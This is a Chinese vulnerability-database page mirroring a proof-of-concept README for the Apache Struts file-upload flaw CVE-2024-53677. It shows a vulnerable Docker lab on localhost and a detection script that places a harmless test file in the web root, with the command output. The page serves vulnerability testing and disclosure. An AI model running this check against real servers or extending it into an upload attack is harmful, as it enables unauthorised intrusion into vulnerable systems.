漏洞平台

POC详情： 2d3700ef2b4fbeee9e4dca29dcd8e4a6e1f6e5f9

来源

https://github.com/0xPThree/struts_cve-2024-53677

关联漏洞

标题： Apache Struts 安全漏洞 (CVE-2024-53677)
描述：Apache Struts是美国阿帕奇（Apache）基金会的一个开源项目，是一套用于创建企业级Java Web应用的开源MVC框架，主要提供两个版本框架产品，Struts 1和Struts 2。 Apache Struts 2.0.0版本至6.4.0之前版本存在安全漏洞，该漏洞源于文件上传逻辑缺陷。

介绍

# Proof-of-Concept
## Setup test environment

```bash
» git clone git@github.com:0xPThree/struts_cve-2024-53677.git
» cd struts_cve-2024-53677
» sudo docker build --ulimit nofile=122880:122880 -m 3G -t struts-6.3.0.1 .
» sudo docker run -p 8081:8080 --ulimit nofile=122880:122880 -m 3G --rm -it --name struts-6.3.0.1 struts-6.3.0.1
```

```html
» curl http://127.0.0.1:8081/upload.action

<html>
  <head>
    <title>File upload</title>
  </head>
  <body>
    <h1>Apache Struts 6.3.0.1</h1>
    <p>Welcome to Apache Struts 6.3.0.1 lab. This application is vulnerable to CVE-2023-50164 and CVE-2024-53677.</p>
    <form id="upload" name="upload" action="/upload.action;jsessionid=196954CE343A603EC7EE26FFF611D302" method="post" enctype="multipart/form-data">
      <table class="wwFormTable">
        <tr>
          <td class="tdLabel"></td>
          <td 
            class="tdInput"            
            ><input type="file" name="upload" id="upload_upload"/></td>
        </tr>
        <tr>
          <td colspan="2">
            <div class="formButton"><input type="submit" value="Submit" id="upload_0"/></div>
          </td>
        </tr>
      </table>
    </form>
  </body>
</html>
```

---

## Exploit
```bash
» curl http://127.0.0.1:8081/vuln_test.txt                                  
<!doctype html><html lang="en"><head><title>HTTP Status 404 – Not Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 – Not Found</h1><hr class="line" /><p><b>Type</b> Status Report</p><p><b>Message</b> The requested resource [&#47;vuln_test.txt] is not available</p><p><b>Description</b> The origin server did not find a current representation for the target resource or is not willing to disclose that one exists.</p><hr class="line" /><h3>Apache Tomcat/9.0.98</h3></body></html>

» python3 check.py -u http://127.0.0.1:8081 --upload_endpoint /upload.action
2025-01-07 12:21:20,822 [INFO] Starting detection process...
2025-01-07 12:21:20,822 [INFO] Starting detection for CVE-2024-53677 (S2-067)...
2025-01-07 12:21:20,823 [INFO] Sending test request to upload endpoint: http://127.0.0.1:8081/upload.action
2025-01-07 12:21:20,838 [INFO] [INFO] File upload request succeeded.
2025-01-07 12:21:20,838 [WARNING] [ALERT] File name overwrite detected. Target may be vulnerable!
2025-01-07 12:21:20,838 [INFO] Detection process completed.

» curl http://127.0.0.1:8081/vuln_test.txt                                  
CVE-2024-53677 / S2-067 detection test.

» sudo docker exec -it struts-6.3.0.1 bash
root@b991eecb47b4:/usr/local/tomcat# cd webapps/ROOT
root@b991eecb47b4:/usr/local/tomcat/webapps/ROOT# ls -al
total 28
drwxr-x--- 5 root root 4096 Jan  7 11:23 .
drwxr-xr-x 1 root root 4096 Jan  7 11:18 ..
drwxr-x--- 2 root root 4096 Jan  7 11:14 forbidden
-rw-r----- 1 root root  226 Jan  7 09:41 index.html
drwxr-x--- 3 root root 4096 Jan  7 11:14 META-INF
-rw-r----- 1 root root   39 Jan  7 11:23 vuln_test.txt
drwxr-x--- 4 root root 4096 Jan  7 11:14 WEB-INF
root@b991eecb47b4:/usr/local/tomcat/webapps/ROOT# cat vuln_test.txt 
CVE-2024-53677 / S2-067 detection test.
```

Check script from: https://github.com/TAM-K592/CVE-2024-53677-S2-067/tree/ALOK

文件快照


 [4.0K]  /data/pocs/2d3700ef2b4fbeee9e4dca29dcd8e4a6e1f6e5f9
├── [2.7K]  check.py
├── [1.3K]  context.xml
├── [ 561]  Dockerfile
├── [3.4K]  README.md
├── [4.0K]  struts-app
│   ├── [8.9K]  mvnw
│   ├── [5.7K]  mvnw.cmd
│   ├── [3.7K]  pom.xml
│   └── [4.0K]  src
│       └── [4.0K]  main
│           ├── [4.0K]  java
│           │   └── [4.0K]  org
│           │       └── [4.0K]  trackflaw
│           │           └── [4.0K]  example
│           │               └── [2.2K]  Upload.java
│           ├── [4.0K]  resources
│           │   └── [ 870]  struts.xml
│           └── [4.0K]  webapp
│               ├── [4.0K]  forbidden
│               ├── [ 226]  index.html
│               └── [4.0K]  WEB-INF
│                   ├── [ 579]  error.jsp
│                   ├── [ 650]  success.jsp
│                   ├── [ 716]  upload.jsp
│                   └── [1.1K]  web.xml
└── [ 219]  tomcat-users.xml

11 directories, 15 files

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。